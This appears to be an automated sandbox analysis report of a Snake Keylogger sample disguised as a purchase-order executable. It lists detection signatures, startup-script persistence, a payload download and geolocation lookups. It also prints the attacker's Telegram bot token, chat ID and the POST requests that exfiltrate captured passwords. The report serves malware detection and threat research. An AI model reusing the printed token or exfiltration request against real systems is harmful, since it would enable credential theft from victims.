0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x68222:$x1: $%SMTPDV$ 0x66bf4:$x2: $#TheHashHere%& 0x681ca:$x3: %FTPDV$ 0x66b94:$x4: $%TelegramDv$ 0x644ad:$x5: KeyLoggerEventArgs 0x64842:$x5: KeyLoggerEventArgs 0x681ee:$m2: Clipboard Logs ID 0x6842c:$m2: Screenshot Logs ID 0x6853c:$m2: keystroke Logs ID 0x68816:$m3: SnakePW 0x68404:$m4: \SnakeKeylogger\
Click to see the 29 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe", CommandLine: "C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe, NewProcessName: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe, OriginalFileName: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe", ProcessId: 7248, ProcessName: PO_63738373663838____________________________________________________________________________.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs" , ProcessId: 8072, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs" , ProcessId: 8072, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe, ProcessId: 7248, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T11:05:02.740749+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.7	49738	TCP
2024-11-05T11:05:42.069210+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.7	49982	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T11:04:53.218676+0100	2803305	3	Unknown Traffic	192.168.2.7	49702	188.114.96.3	443	TCP
2024-11-05T11:04:56.512370+0100	2803305	3	Unknown Traffic	192.168.2.7	49707	188.114.96.3	443	TCP
2024-11-05T11:04:59.778889+0100	2803305	3	Unknown Traffic	192.168.2.7	49726	188.114.96.3	443	TCP
2024-11-05T11:05:01.451239+0100	2803305	3	Unknown Traffic	192.168.2.7	49739	188.114.96.3	443	TCP
2024-11-05T11:05:14.648390+0100	2803305	3	Unknown Traffic	192.168.2.7	49823	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T11:04:51.122024+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49700	132.226.247.73	80	TCP
2024-11-05T11:04:52.512548+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49700	132.226.247.73	80	TCP
2024-11-05T11:04:54.153229+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49703	132.226.247.73	80	TCP
2024-11-05T11:05:12.606399+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49795	132.226.247.73	80	TCP
2024-11-05T11:05:13.953308+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49795	132.226.247.73	80	TCP
2024-11-05T11:05:15.575162+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49828	132.226.247.73	80	TCP
2024-11-05T11:05:17.215779+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49838	132.226.247.73	80	TCP

ETPRO MALWARE Snake Keylogger Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T11:05:17.087746+0100	2853006	1	A Network Trojan was detected	192.168.2.7	49837	149.154.167.220	443	TCP
2024-11-05T11:05:31.172735+0100	2853006	1	A Network Trojan was detected	192.168.2.7	49922	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendMessage?chat_id=5302361040", "Token": "6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE", "Chat_id": "5302361040", "Version": "5.1"}
Source: InstallUtil.exe.7776.7.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Keywords.exe

ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: PO_63738373663838____________________________________________________________________________.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Keywords.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO_63738373663838____________________________________________________________________________.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: PO_63738373663838____________________________________________________________________________.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49813 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.7:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49922 version: TLS 1.2

Source: PO_63738373663838____________________________________________________________________________.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.000000000322D000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1316425818.0000000006D40000.00000004.08000000.00040000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1516774520.00000000043FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.000000000322D000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1316425818.0000000006D40000.00000004.08000000.00040000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1516774520.00000000043FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0171F206h	7_2_0171F017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0171FB90h	7_2_0171F017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0171E538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0171EB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0171ED4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C88945h	7_2_05C88608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C85441h	7_2_05C85198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C88459h	7_2_05C881B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C80FF1h	7_2_05C80D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C88001h	7_2_05C87D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C87BA9h	7_2_05C87900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C80B99h	7_2_05C808F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C80741h	7_2_05C80498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C87751h	7_2_05C874A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C802E9h	7_2_05C80040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C872FAh	7_2_05C87050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C86E79h	7_2_05C86BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_05C833A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_05C833B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C86A21h	7_2_05C86778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C865C9h	7_2_05C86320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C86171h	7_2_05C85EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C85D19h	7_2_05C85A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05C858C1h	7_2_05C85618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0271F1F6h	12_2_0271F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0271FB80h	12_2_0271F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_0271E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_0271EB5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_0271ED3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06211A38h	12_2_06211620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 062102F1h	12_2_06210040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06211471h	12_2_062111C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621F8B9h	12_2_0621F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621FD11h	12_2_0621FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621C8F1h	12_2_0621C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621CD49h	12_2_0621CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621D1A1h	12_2_0621CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621D5F9h	12_2_0621D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621DA51h	12_2_0621D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621DEA9h	12_2_0621DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621E301h	12_2_0621E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06210751h	12_2_062104A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621E759h	12_2_0621E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621B791h	12_2_0621B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06210BB1h	12_2_06210900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621EBB1h	12_2_0621E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06211011h	12_2_06210D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621F009h	12_2_0621ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06211A38h	12_2_06211966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621BBE9h	12_2_0621B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621F461h	12_2_0621F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621C041h	12_2_0621BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621C499h	12_2_0621C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06248945h	12_2_06248608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 062458C1h	12_2_06245618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06245D19h	12_2_06245A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06246171h	12_2_06245EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 062465C9h	12_2_06246320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06246A21h	12_2_06246778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_062433A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_062433B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06246E79h	12_2_06246BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 062402E9h	12_2_06240040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 062472FAh	12_2_06247050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06247751h	12_2_062474A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06240741h	12_2_06240498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06240B99h	12_2_062408F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06247BA9h	12_2_06247900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06240FF1h	12_2_06240D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06248001h	12_2_06247D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06248459h	12_2_062481B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06245441h	12_2_06245198

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49922 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49837 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /ruurew/Gksrgyexmxn.pdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /ruurew/Gksrgyexmxn.pdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendDocument?chat_id=5302361040&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfe6ad1716199Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendDocument?chat_id=5302361040&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfe16f480c19bHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.132.193.46 188.132.193.46
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49703 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49700 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49795 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49838 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49828 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49702 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49726 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49738
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49823 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49982
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49739 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
